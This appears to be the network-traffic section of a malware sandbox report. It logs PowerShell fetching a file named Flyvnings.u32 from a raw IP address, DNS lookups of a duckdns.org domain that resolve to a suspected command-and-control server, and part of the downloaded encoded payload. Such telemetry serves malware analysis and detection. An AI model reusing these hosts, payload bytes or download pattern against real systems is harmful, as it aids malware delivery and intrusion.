                                                                  Apr 25, 2024 15:12:13.631661892 CEST804973887.121.105.163192.168.2.4
                                                                  Apr 25, 2024 15:12:13.631670952 CEST4973880192.168.2.487.121.105.163
                                                                  Apr 25, 2024 15:12:13.631700039 CEST804973887.121.105.163192.168.2.4
                                                                  Apr 25, 2024 15:12:13.631709099 CEST4973880192.168.2.487.121.105.163
                                                                  Apr 25, 2024 15:12:13.631738901 CEST804973887.121.105.163192.168.2.4
                                                                  Apr 25, 2024 15:12:13.631746054 CEST4973880192.168.2.487.121.105.163
                                                                  Apr 25, 2024 15:12:13.631778002 CEST804973887.121.105.163192.168.2.4
                                                                  Apr 25, 2024 15:12:13.631788015 CEST4973880192.168.2.487.121.105.163
                                                                  Apr 25, 2024 15:12:13.631818056 CEST804973887.121.105.163192.168.2.4
                                                                  Apr 25, 2024 15:12:13.631825924 CEST4973880192.168.2.487.121.105.163
                                                                  Apr 25, 2024 15:12:13.631855965 CEST804973887.121.105.163192.168.2.4
                                                                  Apr 25, 2024 15:12:13.631860018 CEST4973880192.168.2.487.121.105.163
                                                                  Apr 25, 2024 15:12:13.631892920 CEST804973887.121.105.163192.168.2.4
                                                                  Apr 25, 2024 15:12:13.631901979 CEST4973880192.168.2.487.121.105.163
                                                                  Apr 25, 2024 15:12:13.631931067 CEST804973887.121.105.163192.168.2.4
                                                                  Apr 25, 2024 15:12:13.631939888 CEST4973880192.168.2.487.121.105.163
                                                                  Apr 25, 2024 15:12:13.631968975 CEST804973887.121.105.163192.168.2.4
                                                                  Apr 25, 2024 15:12:13.631973982 CEST4973880192.168.2.487.121.105.163
                                                                  Apr 25, 2024 15:12:13.632005930 CEST804973887.121.105.163192.168.2.4
                                                                  Apr 25, 2024 15:12:13.632011890 CEST4973880192.168.2.487.121.105.163
                                                                  Apr 25, 2024 15:12:13.632044077 CEST804973887.121.105.163192.168.2.4
                                                                  Apr 25, 2024 15:12:13.632045984 CEST4973880192.168.2.487.121.105.163
                                                                  Apr 25, 2024 15:12:13.632081032 CEST804973887.121.105.163192.168.2.4
                                                                  Apr 25, 2024 15:12:13.632090092 CEST4973880192.168.2.487.121.105.163
                                                                  Apr 25, 2024 15:12:13.632127047 CEST4973880192.168.2.487.121.105.163
                                                                  Apr 25, 2024 15:12:13.632181883 CEST804973887.121.105.163192.168.2.4
                                                                  Apr 25, 2024 15:12:13.632219076 CEST804973887.121.105.163192.168.2.4
                                                                  Apr 25, 2024 15:12:13.632225037 CEST4973880192.168.2.487.121.105.163
                                                                  Apr 25, 2024 15:12:13.632266998 CEST4973880192.168.2.487.121.105.163
                                                                  Apr 25, 2024 15:12:13.632314920 CEST804973887.121.105.163192.168.2.4
                                                                  Apr 25, 2024 15:12:13.632350922 CEST804973887.121.105.163192.168.2.4
                                                                  Apr 25, 2024 15:12:13.632363081 CEST4973880192.168.2.487.121.105.163
                                                                  Apr 25, 2024 15:12:13.632389069 CEST804973887.121.105.163192.168.2.4
                                                                  Apr 25, 2024 15:12:13.632391930 CEST4973880192.168.2.487.121.105.163
                                                                  Apr 25, 2024 15:12:13.632426023 CEST804973887.121.105.163192.168.2.4
                                                                  Apr 25, 2024 15:12:13.632428885 CEST4973880192.168.2.487.121.105.163
                                                                  Apr 25, 2024 15:12:13.632462978 CEST804973887.121.105.163192.168.2.4
                                                                  Apr 25, 2024 15:12:13.632468939 CEST4973880192.168.2.487.121.105.163
                                                                  Apr 25, 2024 15:12:13.632502079 CEST804973887.121.105.163192.168.2.4
                                                                  Apr 25, 2024 15:12:13.632504940 CEST4973880192.168.2.487.121.105.163
                                                                  Apr 25, 2024 15:12:13.632543087 CEST4973880192.168.2.487.121.105.163
                                                                  Apr 25, 2024 15:12:13.632586002 CEST804973887.121.105.163192.168.2.4
                                                                  Apr 25, 2024 15:12:13.632622957 CEST804973887.121.105.163192.168.2.4
                                                                  Apr 25, 2024 15:12:13.632630110 CEST4973880192.168.2.487.121.105.163
                                                                  Apr 25, 2024 15:12:13.632659912 CEST804973887.121.105.163192.168.2.4
                                                                  Apr 25, 2024 15:12:13.632666111 CEST4973880192.168.2.487.121.105.163
                                                                  Apr 25, 2024 15:12:13.632704020 CEST4973880192.168.2.487.121.105.163
                                                                  Apr 25, 2024 15:12:13.632742882 CEST804973887.121.105.163192.168.2.4
                                                                  Apr 25, 2024 15:12:13.632780075 CEST804973887.121.105.163192.168.2.4
                                                                  Apr 25, 2024 15:12:13.632787943 CEST4973880192.168.2.487.121.105.163
                                                                  Apr 25, 2024 15:12:13.632817030 CEST804973887.121.105.163192.168.2.4
                                                                  Apr 25, 2024 15:12:13.632826090 CEST4973880192.168.2.487.121.105.163
                                                                  Apr 25, 2024 15:12:13.632857084 CEST804973887.121.105.163192.168.2.4
                                                                  Apr 25, 2024 15:12:13.632858038 CEST4973880192.168.2.487.121.105.163
                                                                  Apr 25, 2024 15:12:13.632917881 CEST804973887.121.105.163192.168.2.4
                                                                  Apr 25, 2024 15:12:13.632926941 CEST4973880192.168.2.487.121.105.163
                                                                  Apr 25, 2024 15:12:13.632956028 CEST804973887.121.105.163192.168.2.4
                                                                  Apr 25, 2024 15:12:13.632961988 CEST4973880192.168.2.487.121.105.163
                                                                  Apr 25, 2024 15:12:13.632992983 CEST804973887.121.105.163192.168.2.4
                                                                  Apr 25, 2024 15:12:13.633003950 CEST4973880192.168.2.487.121.105.163
                                                                  Apr 25, 2024 15:12:13.633029938 CEST804973887.121.105.163192.168.2.4
                                                                  Apr 25, 2024 15:12:13.633058071 CEST4973880192.168.2.487.121.105.163
                                                                  Apr 25, 2024 15:12:13.633065939 CEST804973887.121.105.163192.168.2.4
                                                                  Apr 25, 2024 15:12:13.633076906 CEST4973880192.168.2.487.121.105.163
                                                                  Apr 25, 2024 15:12:13.633101940 CEST804973887.121.105.163192.168.2.4
                                                                  Apr 25, 2024 15:12:13.633111954 CEST4973880192.168.2.487.121.105.163
                                                                  Apr 25, 2024 15:12:13.633141041 CEST804973887.121.105.163192.168.2.4
                                                                  Apr 25, 2024 15:12:13.633156061 CEST4973880192.168.2.487.121.105.163
                                                                  Apr 25, 2024 15:12:13.633177996 CEST804973887.121.105.163192.168.2.4
                                                                  Apr 25, 2024 15:12:13.633183956 CEST4973880192.168.2.487.121.105.163
                                                                  Apr 25, 2024 15:12:13.633229971 CEST4973880192.168.2.487.121.105.163
                                                                  Apr 25, 2024 15:12:13.633260965 CEST804973887.121.105.163192.168.2.4
                                                                  Apr 25, 2024 15:12:13.633300066 CEST804973887.121.105.163192.168.2.4
                                                                  Apr 25, 2024 15:12:13.633311033 CEST4973880192.168.2.487.121.105.163
                                                                  Apr 25, 2024 15:12:13.633338928 CEST804973887.121.105.163192.168.2.4
                                                                  Apr 25, 2024 15:12:13.633352995 CEST4973880192.168.2.487.121.105.163
                                                                  Apr 25, 2024 15:12:13.633389950 CEST4973880192.168.2.487.121.105.163
                                                                  Apr 25, 2024 15:12:13.633411884 CEST804973887.121.105.163192.168.2.4
                                                                  Apr 25, 2024 15:12:13.633447886 CEST804973887.121.105.163192.168.2.4
                                                                  Apr 25, 2024 15:12:13.633462906 CEST4973880192.168.2.487.121.105.163
                                                                  Apr 25, 2024 15:12:13.633482933 CEST804973887.121.105.163192.168.2.4
                                                                  Apr 25, 2024 15:12:13.633497953 CEST4973880192.168.2.487.121.105.163
                                                                  Apr 25, 2024 15:12:13.633518934 CEST804973887.121.105.163192.168.2.4
                                                                  Apr 25, 2024 15:12:13.633529902 CEST4973880192.168.2.487.121.105.163
                                                                  Apr 25, 2024 15:12:13.633555889 CEST804973887.121.105.163192.168.2.4
                                                                  Apr 25, 2024 15:12:13.633569956 CEST4973880192.168.2.487.121.105.163
                                                                  Apr 25, 2024 15:12:13.633594990 CEST804973887.121.105.163192.168.2.4
                                                                  Apr 25, 2024 15:12:13.633610010 CEST4973880192.168.2.487.121.105.163
                                                                  Apr 25, 2024 15:12:13.633635044 CEST804973887.121.105.163192.168.2.4
                                                                  Apr 25, 2024 15:12:13.633646965 CEST4973880192.168.2.487.121.105.163
                                                                  Apr 25, 2024 15:12:13.633673906 CEST804973887.121.105.163192.168.2.4
                                                                  Apr 25, 2024 15:12:13.633678913 CEST4973880192.168.2.487.121.105.163
                                                                  Apr 25, 2024 15:12:13.633721113 CEST4973880192.168.2.487.121.105.163
                                                                  Apr 25, 2024 15:12:14.881084919 CEST497393770192.168.2.494.156.79.69
                                                                  Apr 25, 2024 15:12:15.111160994 CEST37704973994.156.79.69192.168.2.4
                                                                  Apr 25, 2024 15:12:15.111249924 CEST497393770192.168.2.494.156.79.69
                                                                  Apr 25, 2024 15:12:15.113452911 CEST497393770192.168.2.494.156.79.69
                                                                  Apr 25, 2024 15:12:15.392412901 CEST37704973994.156.79.69192.168.2.4
                                                                  Apr 25, 2024 15:12:18.428219080 CEST804973887.121.105.163192.168.2.4
                                                                  Apr 25, 2024 15:12:18.428299904 CEST4973880192.168.2.487.121.105.163
                                                                  Apr 25, 2024 15:12:48.429980993 CEST804973887.121.105.163192.168.2.4
                                                                  Apr 25, 2024 15:13:16.490109921 CEST497393770192.168.2.494.156.79.69
                                                                  Apr 25, 2024 15:13:20.518553972 CEST497403771192.168.2.494.156.79.69
                                                                  Apr 25, 2024 15:13:20.752419949 CEST37714974094.156.79.69192.168.2.4
                                                                  Apr 25, 2024 15:13:21.255002022 CEST497403771192.168.2.494.156.79.69
                                                                  Apr 25, 2024 15:13:21.488857031 CEST37714974094.156.79.69192.168.2.4
                                                                  Apr 25, 2024 15:13:21.989305973 CEST497403771192.168.2.494.156.79.69
                                                                  Apr 25, 2024 15:13:22.223201036 CEST37714974094.156.79.69192.168.2.4
                                                                  Apr 25, 2024 15:13:22.723690033 CEST497403771192.168.2.494.156.79.69
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Apr 25, 2024 15:12:14.231359005 CEST5895553192.168.2.41.1.1.1
                                                                  Apr 25, 2024 15:12:14.877171993 CEST53589551.1.1.1192.168.2.4
                                                                  Apr 25, 2024 15:13:16.491130114 CEST6287753192.168.2.41.1.1.1
                                                                  Apr 25, 2024 15:13:17.505570889 CEST6287753192.168.2.41.1.1.1
                                                                  Apr 25, 2024 15:13:18.521648884 CEST6287753192.168.2.41.1.1.1
                                                                  Apr 25, 2024 15:13:19.905884027 CEST53628771.1.1.1192.168.2.4
                                                                  Apr 25, 2024 15:13:19.905922890 CEST53628771.1.1.1192.168.2.4
                                                                  Apr 25, 2024 15:13:19.905936003 CEST53628771.1.1.1192.168.2.4
                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                  Apr 25, 2024 15:12:14.231359005 CEST192.168.2.41.1.1.10x233fStandard query (0)darvien99lakoustr01.duckdns.orgA (IP address)IN (0x0001)false
                                                                  Apr 25, 2024 15:13:16.491130114 CEST192.168.2.41.1.1.10xac44Standard query (0)darvien99lakoustr01.duckdns.orgA (IP address)IN (0x0001)false
                                                                  Apr 25, 2024 15:13:17.505570889 CEST192.168.2.41.1.1.10xac44Standard query (0)darvien99lakoustr01.duckdns.orgA (IP address)IN (0x0001)false
                                                                  Apr 25, 2024 15:13:18.521648884 CEST192.168.2.41.1.1.10xac44Standard query (0)darvien99lakoustr01.duckdns.orgA (IP address)IN (0x0001)false
                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  Apr 25, 2024 15:11:11.464981079 CEST1.1.1.1192.168.2.40xf3feNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                  Apr 25, 2024 15:11:11.464981079 CEST1.1.1.1192.168.2.40xf3feNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                  Apr 25, 2024 15:11:30.494478941 CEST1.1.1.1192.168.2.40x38c7No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                  Apr 25, 2024 15:11:30.494478941 CEST1.1.1.1192.168.2.40x38c7No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                  Apr 25, 2024 15:12:14.877171993 CEST1.1.1.1192.168.2.40x233fNo error (0)darvien99lakoustr01.duckdns.org94.156.79.69A (IP address)IN (0x0001)false
                                                                  Apr 25, 2024 15:13:19.905884027 CEST1.1.1.1192.168.2.40xac44No error (0)darvien99lakoustr01.duckdns.org94.156.79.69A (IP address)IN (0x0001)false
                                                                  Apr 25, 2024 15:13:19.905922890 CEST1.1.1.1192.168.2.40xac44No error (0)darvien99lakoustr01.duckdns.org94.156.79.69A (IP address)IN (0x0001)false
                                                                  Apr 25, 2024 15:13:19.905936003 CEST1.1.1.1192.168.2.40xac44No error (0)darvien99lakoustr01.duckdns.org94.156.79.69A (IP address)IN (0x0001)false
                                                                  • 87.121.105.163
                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.2.44973687.121.105.163806228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Apr 25, 2024 15:11:31.685739994 CEST171OUTGET /Flyvnings.u32 HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Host: 87.121.105.163
                                                                  Connection: Keep-Alive
                                                                  Apr 25, 2024 15:11:31.891104937 CEST1289INHTTP/1.1 200 OK
                                                                  Date: Thu, 25 Apr 2024 13:11:31 GMT
                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                  Last-Modified: Thu, 18 Apr 2024 06:27:26 GMT
                                                                  ETag: "6fcb0-61659108f6f80"
                                                                  Accept-Ranges: bytes
                                                                  Content-Length: 457904
                                                                  Keep-Alive: timeout=5, max=100
                                                                  Connection: Keep-Alive
                                                                  Data Raw: 36 77 4c 44 54 33 45 42 6d 37 76 31 4a 52 59 41 63 51 47 62 36 77 4b 2b 69 77 4e 63 4a 41 54 72 41 76 32 6c 36 77 4c 4b 4e 62 6b 31 4c 57 44 41 36 77 49 78 47 65 73 43 42 44 53 42 38 65 46 62 69 6e 35 78 41 5a 76 72 41 6e 30 55 67 65 6e 55 64 75 71 2b 36 77 49 6f 72 6e 45 42 6d 2b 73 43 51 53 5a 78 41 5a 75 36 79 68 64 35 79 2b 73 43 59 69 44 72 41 73 46 68 63 51 47 62 36 77 4b 2b 64 54 48 4b 36 77 4c 48 55 2b 73 43 78 54 57 4a 46 41 76 72 41 6e 33 46 36 77 49 5a 39 4e 48 69 63 51 47 62 63 51 47 62 67 38 45 45 36 77 4c 30 6b 4f 73 43 38 7a 47 42 2b 63 74 63 74 67 42 38 79 65 73 43 71 36 48 72 41 75 36 45 69 30 51 6b 42 48 45 42 6d 2b 73 43 56 6e 32 4a 77 2b 73 43 6d 4c 7a 72 41 6a 36 36 67 63 4d 42 57 6d 55 41 63 51 47 62 63 51 47 62 75 6e 42 38 50 36 6a 72 41 69 6d 38 63 51 47 62 67 66 49 75 4d 6a 51 78 36 77 49 62 54 58 45 42 6d 34 48 79 58 6b 34 4c 6d 65 73 43 6f 33 56 78 41 5a 74 78 41 5a 76 72 41 73 44 38 63 51 47 62 63 51 47 62 69 77 77 51 36 77 4a 63 55 65 73 43 38 74 36 4a 44 42 50 72 41 67 30 57 36 77 4c 4c 4e 55 4a 78 41 5a 74 78 41 5a 75 42 2b 6f 44 64 42 41 42 31 31 58 45 42 6d 2b 73 43 77 53 71 4a 58 43 51 4d 36 77 4a 64 66 58 45 42 6d 34 48 74 41 41 4d 41 41 48 45 42 6d 2b 73 43 47 37 43 4c 56 43 51 49 63 51 47 62 36 77 49 38 4e 59 74 38 4a 41 54 72 41 73 6e 54 36 77 4c 56 4e 49 6e 72 36 77 49 54 38 2b 73 43 69 70 57 42 77 35 77 41 41 41 44 72 41 6b 56 32 36 77 4a 79 43 31 50 72 41 6a 33 31 36 77 4c 50 47 32 70 41 63 51 47 62 63 51 47 62 69 65 74 78 41 5a 76 72 41 6e 72 39 78 34 4d 41 41 51 41 41 41 4a 44 50 41 4f 73 43 69 4b 6c 78 41 5a 75 42 77 77 41 42 41 41 44 72 41 6e 4a 30 36 77 4b 38 57 6c 50 72 41 6b 52 79 36 77 4a 37 4c 34 6e 72 63 51 47 62 63 51 47 62 69 62 73 45 41 51 41 41 36 77 49 74 46 4f 73 43 4a 63 4f 42 77 77 51 42 41 41 44 72 41 72 50 68 36 77 4a 7a 4a 31 50 72 41 6d 6c 6a 36 77 4b 35 52 57 72 2f 63 51 47 62 36 77 49 48 50 59 50 43 42 58 45 42 6d 2b 73 43 33 39 38 78 39 6e 45 42 6d 2b 73 43 75 74 55 78 79 58 45 42 6d 2b 73 43 31 61 79 4c 47 75 73 43 46 4e 46 78 41 5a 74 42 36 77 49 75 72 48 45 42 6d 7a 6b 63 43 6e 58 7a 36 77 4b 62 49 58 45 42 6d 30 62 72 41 72 43 4c 36 77 4b 6e 4d 34 42 38 43 76 75 34 64 64 78 78 41 5a 74 78 41 5a 75 4c 52 41 72 38 36 77 4a 7a 73 58 45 42 6d 79 6e 77 63 51 47 62 36 77 4b 6b 34 50 2f 53 63 51 47 62 63 51 47 62 75 6f 44 64 42 41 42 78 41 5a 76 72 41 76 51 64 4d 63 44 72 41 72 39 6a 63 51 47 62 69 33 77 6b 44 48 45 42 6d 33 45 42 6d 34 45 30 42 31 66 45 56 72 46 78 41 5a 74 78 41 5a 75 44 77 41 54 72 41 74 69 4f 36 77 4a 68 39 6a 6e 51 64 65 52 78 41 5a 76 72 41 67 71 2b 69 66 76 72 41 73 5a 32 36 77 4b 34 4d 76 2f 58 36 77 4b 6d 62 48 45 42 6d 39 4d 63 33 31 54 65 55 58 4e 4f 71 44 76 73 47 6d 56 6f 47 6a 43 6c 30 6c 6c 45 4f 45 57 6b 65 52 38 68 46 54 43 6c 73 53 41 4e 4e 2b 32 43 4f 73 4c 68 71 55 36 6f 2f 4c 50 6b 62 79 50 66 56 4f 35 75 76 37 39 36 6f 74 4e 7a 62 7a 6a 58 51 49 6e 47 55 43 48 54 4d 74 64 41 35 70 36 72 79 4b 45 43 48 7a 43 6d 47 65 64 45 6b 36 4c 54 59 4a 43 41 57 37 45 62 76 77 37 4b 31 72 42 62 73 65 68 5a 69 38 2f 57 73 46 75 78
                                                                  Data Ascii: 6wLDT3EBm7v1JRYAcQGb6wK+iwNcJATrAv2l6wLKNbk1LWDA6wIxGesCBDSB8eFbin5xAZvrAn0UgenUduq+6wIornEBm+sCQSZxAZu6yhd5y+sCYiDrAsFhcQGb6wK+dTHK6wLHU+sCxTWJFAvrAn3F6wIZ9NHicQGbcQGbg8EE6wL0kOsC8zGB+ctctgB8yesCq6HrAu6Ei0QkBHEBm+sCVn2Jw+sCmLzrAj66gcMBWmUAcQGbcQGbunB8P6jrAim8cQGbgfIuMjQx6wIbTXEBm4HyXk4LmesCo3VxAZtxAZvrAsD8cQGbcQGbiwwQ6wJcUesC8t6JDBPrAg0W6wLLNUJxAZtxAZuB+oDdBAB11XEBm+sCwSqJXCQM6wJdfXEBm4HtAAMAAHEBm+sCG7CLVCQIcQGb6wI8NYt8JATrAsnT6wLVNInr6wIT8+sCipWBw5wAAADrAkV26wJyC1PrAj316wLPG2pAcQGbcQGbietxAZvrAnr9x4MAAQAAAJDPAOsCiKlxAZuBwwABAADrAnJ06wK8WlPrAkRy6wJ7L4nrcQGbcQGbibsEAQAA6wItFOsCJcOBwwQBAADrArPh6wJzJ1PrAmlj6wK5RWr/cQGb6wIHPYPCBXEBm+sC398x9nEBm+sCutUxyXEBm+sC1ayLGusCFNFxAZtB6wIurHEBmzkcCnXz6wKbIXEBm0brArCL6wKnM4B8Cvu4ddxxAZtxAZuLRAr86wJzsXEBmynwcQGb6wKk4P/ScQGbcQGbuoDdBABxAZvrAvQdMcDrAr9jcQGbi3wkDHEBm3EBm4E0B1fEVrFxAZtxAZuDwATrAtiO6wJh9jnQdeRxAZvrAgq+ifvrAsZ26wK4Mv/X6wKmbHEBm9Mc31TeUXNOqDvsGmVoGjCl0llEOEWkeR8hFTClsSANN+2COsLhqU6o/LPkbyPfVO5uv796otNzbzjXQInGUCHTMtdA5p6ryKECHzCmGedEk6LTYJCAW7Ebvw7K1rBbsehZi8/WsFux
                                                                  Apr 25, 2024 15:11:31.891124010 CEST1289INData Raw: 71 67 36 65 5a 39 61 77 57 37 46 5a 36 42 74 69 30 78 54 66 4c 45 4c 47 56 72 48 73 71 4c 75 76 59 55 43 4e 4d 4b 51 67 63 6e 72 7a 6f 74 4e 35 31 6a 64 59 2f 33 6b 72 62 6c 33 57 4c 39 51 32 72 4c 6c 58 61 4e 78 5a 51 37 4e 58 78 47 39 6f 33 6b
                                                                  Data Ascii: qg6eZ9awW7FZ6Bti0xTfLELGVrHsqLuvYUCNMKQgcnrzotN51jdY/3krbl3WL9Q2rLlXaNxZQ7NXxG9o3klNs1fEoXD3j4eW7uJOBvlFp4yz5M8wlp+ikFtFl7NGguqI2t9UsVdP26pVxFa+0r+pTqj8lTWGQIc0lKLTcdIFbmDeQS6wV8RvejH9nTjKiFexV/yeGcuXvvGEwFY4EoDSTr5Xw7VXotdO5PfZNDPFVrGvrERPQ9y
                                                                  Apr 25, 2024 15:11:31.891285896 CEST1289INData Raw: 67 6d 39 30 6a 34 35 65 70 2f 4d 45 61 54 78 46 34 6f 49 78 32 4d 56 35 46 7a 42 4f 46 38 54 2b 50 39 4a 45 6b 74 30 34 38 32 2b 6b 6d 36 77 6b 77 70 49 73 4d 32 53 56 4e 56 48 65 42 4e 46 35 7a 61 46 36 67 70 55 6a 79 7a 43 71 51 66 38 44 6c 6c
                                                                  Data Ascii: gm90j45ep/MEaTxF4oIx2MV5FzBOF8T+P9JEkt0482+km6wkwpIsM2SVNVHeBNF5zaF6gpUjyzCqQf8DllFaFKx3ln4sFfE33IET8sfVsRW4e8ARqs+8dfyNyNjojkTt5wB+PveAFjfVl7Dy9fSDi2QGZ2L+cRV2RJtwe0HvNn7ynSlzxnpUd2a21M+OspnJLjQWTbEtGLYizFBjO4xQYXpBn04IStJ13DcnI791jX7POJ913C0
                                                                  Apr 25, 2024 15:11:31.891304970 CEST1289INData Raw: 34 47 71 2f 66 58 6b 34 66 6d 75 47 6e 67 33 36 6d 43 49 37 77 55 38 62 56 75 32 4b 57 58 70 4d 54 61 36 7a 62 66 74 5a 33 65 51 58 4f 7a 56 38 54 75 30 44 49 56 7a 6e 30 78 48 7a 4f 49 4d 69 33 76 2f 4f 4e 33 42 4e 50 6a 68 62 75 78 78 47 73 72
                                                                  Data Ascii: 4Gq/fXk4fmuGng36mCI7wU8bVu2KWXpMTa6zbftZ3eQXOzV8Tu0DIVzn0xHzOIMi3v/ON3BNPjhbuxxGsrC9qg1pc5UsWGogjMtVI9nutXcTQqM04ZaccSdZwYXvsIUi8pMmLBVQQPL5qz8R10RdB4Nup765BpVFBFvS11i5L/dnLh3Gn6f/si6LbFrQPRb6tSYWm6FuHcQXOzV8QGCeYo2a1iF/PML/E0+aWgBC3eJlezyqJvT
                                                                  Apr 25, 2024 15:11:31.891395092 CEST1289INData Raw: 59 56 4e 64 77 38 69 2b 32 2f 39 59 31 4b 6f 65 76 2b 4e 64 41 51 44 48 37 4e 64 59 46 31 6b 42 4e 58 41 51 74 33 69 5a 66 75 38 70 42 67 4d 4e 4a 78 73 2b 4e 34 68 30 52 75 52 79 68 71 77 38 57 41 55 43 6f 4e 37 33 39 33 49 77 4d 61 50 30 68 52
                                                                  Data Ascii: YVNdw8i+2/9Y1Koev+NdAQDH7NdYF1kBNXAQt3iZfu8pBgMNJxs+N4h0RuRyhqw8WAUCoN7393IwMaP0hREat9N7Fx1NQNlC1M5eJcGEP624PD9k61UMI1uhyrQ3fojB74NzFUtDXhXMhFEXnrPwesFDfDITFVrHou36p1EWhGk30g+Pt2mCW30WkV256KjC9PFgoo5XKOLbNRyzSNy+90yyn/pGXvnw+YkSLwKhEGkvNohOrdu
                                                                  Apr 25, 2024 15:11:31.891412973 CEST1289INData Raw: 52 59 6f 36 78 4d 37 75 33 6f 43 39 55 5a 38 47 4f 74 4a 6f 56 37 46 58 43 42 36 53 30 59 79 72 4d 67 43 6d 43 36 50 79 30 53 73 76 34 49 74 74 49 2f 42 6e 77 34 2b 67 75 72 30 4a 34 46 4c 5a 34 75 78 35 33 72 6a 36 52 61 55 61 72 55 37 62 4d 4b
                                                                  Data Ascii: RYo6xM7u3oC9UZ8GOtJoV7FXCB6S0YyrMgCmC6Py0Ssv4IttI/Bnw4+gur0J4FLZ4ux53rj6RaUarU7bMKRlXDvfRZUCh0xVMLzIqSD8TVViwjmrMD47cSXiRo2VA7nl17EDPOYPF3E02741n7xAQRwMLBgFU8TVdW/LV67FxFaxV8RWsVfEVrFXxFaxV8RWsVfEVjfVov0qO5TuxqXgm7Slb79JYjkhpJTxqKDdI2PbrlW04st
                                                                  Apr 25, 2024 15:11:31.891426086 CEST1289INData Raw: 61 56 31 2f 42 65 6d 4f 47 51 38 46 35 6d 39 65 71 4b 62 79 65 77 71 2f 6a 6d 6b 33 41 43 75 32 4e 4e 35 34 56 61 6f 73 66 78 44 37 56 4c 63 77 6c 38 65 44 41 6a 54 59 74 34 66 42 2b 6e 41 4a 31 6c 61 63 52 58 4e 5a 35 65 78 73 65 45 56 2f 4d 4a
                                                                  Data Ascii: aV1/BemOGQ8F5m9eqKbyewq/jmk3ACu2NN54VaosfxD7VLcwl8eDAjTYt4fB+nAJ1lacRXNZ5exseEV/MJLMr80OO7b+Nwp067RucXeBELxV2u8+xixqHEasFfEAQ6ZXZZJ1jMQmE5o13Y9GKtH1gPoNoN/13bzIgJJ3suQZ+LH3BRKunmSyMRjtNaMYBK0zLQIHZLdHehgbxrwylk23mH67Q7sgewjm779l8BWOJBN061VxFYJ
                                                                  Apr 25, 2024 15:11:31.891434908 CEST1289INData Raw: 6a 61 56 6a 68 67 72 53 4a 4e 35 46 33 4a 2b 7a 65 66 66 78 65 6d 32 7a 6f 79 4a 35 75 66 4d 55 45 33 6c 69 37 30 55 61 4d 70 38 33 42 58 30 76 76 72 38 55 36 76 6e 54 57 37 52 48 65 79 66 31 77 56 47 41 4d 61 63 41 6c 39 64 2f 6b 76 7a 6f 6b 2b
                                                                  Data Ascii: jaVjhgrSJN5F3J+zeffxem2zoyJ5ufMUE3li70UaMp83BX0vvr8U6vnTW7RHeyf1wVGAMacAl9d/kvzok+d/t1bspFCO3mY21OV3xqbuDrrErQRNx5MLepDsqR2hTd4+35QTSXRaSjnPblMKX/jiNzRZQ0WiSIMJVeuUueTVzmlawxibDioX6ou0X8AOwVzWD28Gzp9Vc6Polv1eY1pp1PhJRbapQwNXRJDDjCxVSxV02s49xRV
                                                                  Apr 25, 2024 15:11:31.891443968 CEST1289INData Raw: 78 56 38 52 57 73 56 66 45 56 72 46 58 78 4e 69 71 4d 36 4b 77 73 67 6a 4a 73 47 2f 36 67 47 68 48 42 35 50 70 77 71 36 56 77 54 43 67 53 4f 47 55 39 55 57 52 73 6c 45 42 54 6a 43 51 4f 76 31 33 35 70 66 4b 4f 4c 54 4e 62 53 7a 53 44 43 61 71 69
                                                                  Data Ascii: xV8RWsVfEVrFXxNiqM6KwsgjJsG/6gGhHB5Ppwq6VwTCgSOGU9UWRslEBTjCQOv135pfKOLTNbSzSDCaqi17Ayx/ecGO1CBWj+sizR/VtIjzRwKeV3gUOADdEQGS5Rg3UBzzaCIg2OazEQZXq1rkef8XEVr7TrIiwV5vdNGDGVrEFfiUsCUPXQzDNHCvWLurEJSPXQ7pAIkLWLk01gQLfq0ZZE7JGzu3Mpk9RQoRGCK0rsPOKKN
                                                                  Apr 25, 2024 15:11:31.891488075 CEST1289INData Raw: 79 39 64 75 42 69 47 67 6f 73 38 51 61 56 51 51 54 6c 46 4c 51 74 46 51 48 34 4b 78 46 41 32 70 54 75 2f 66 55 59 47 58 33 33 35 6f 32 63 41 42 5a 59 65 71 4f 6d 4a 63 67 66 44 4d 68 46 75 62 4e 2f 32 68 42 59 50 76 62 68 55 4d 31 31 67 44 5a 62
                                                                  Data Ascii: y9duBiGgos8QaVQQTlFLQtFQH4KxFA2pTu/fUYGX335o2cABZYeqOmJcgfDMhFubN/2hBYPvbhUM11gDZbFXxFaxV8RWsVfEVrFXxFaxV8RWsVdFRmzpy5TWe9eGbOSsqQQXxVaxv9T6tVcIbfyxcoJMMDb4cjYLtFJEFIdMzI1aCKXsUTx8mvwCKsBkd9SISxZYDN8FBn1FreqC10Dw+ZZ41jVNqAoC10D4/Xb4BFjfUlbPy9d
                                                                  Apr 25, 2024 15:11:32.095952988 CEST1289INData Raw: 33 41 31 6c 34 34 70 66 6b 37 64 37 57 66 4a 4d 66 32 50 36 64 4d 77 43 44 67 53 34 41 55 4b 39 75 31 6b 72 64 59 48 64 4e 6e 34 7a 4e 64 43 6c 46 53 33 6c 51 56 59 33 31 4e 65 33 73 76 58 30 6a 73 6e 6f 42 4a 6d 58 32 63 52 66 7a 65 51 4d 43 44
                                                                  Data Ascii: 3A1l44pfk7d7WfJMf2P6dMwCDgS4AUK9u1krdYHdNn4zNdClFS3lQVY31Ne3svX0jsnoBJmX2cRfzeQMCDIxSANfIeicsOC61oFr8AJ7efchcORE8Ndp/BtgplSRvgznUh/19IXDNfSDg3ZHzoNVVjFT+dXxFaxV8RWsVfEVrFXxFaxV8RWsVfEwekY8yvXr5jL9E8q8XYSp865A0BwtlyV7ywCjgwwpuacXXFFl46EndU4ZtUO


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  1192.168.2.44973887.121.105.163806872C:\Program Files (x86)\Windows Mail\wab.exe
                                                                  TimestampBytes transferredDirectionData
